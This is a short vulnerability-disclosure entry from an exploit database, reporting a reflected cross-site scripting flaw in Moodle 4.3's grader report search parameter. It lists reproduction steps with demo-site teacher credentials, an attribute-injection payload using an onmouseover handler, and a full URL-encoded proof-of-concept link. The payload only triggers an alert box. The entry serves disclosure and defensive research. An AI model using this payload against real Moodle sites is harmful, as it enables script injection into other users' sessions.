Moodle 4.3 Cross Site Scripting

2023.10.23
Credit: tmrswrr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Moodle 4.3 Reflected XSS # Date: 21/10/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://moodle.org/ # Software Demo: https://school.moodledemo.net/ # Version: 4.3 # Tested on: Linux Vulnerability Details ====================== Steps : 1. Log in to the application with the given credentials > USER: teacher PASS: moodle 2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue= 3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3 4. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3" 5. You will be see alert button


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top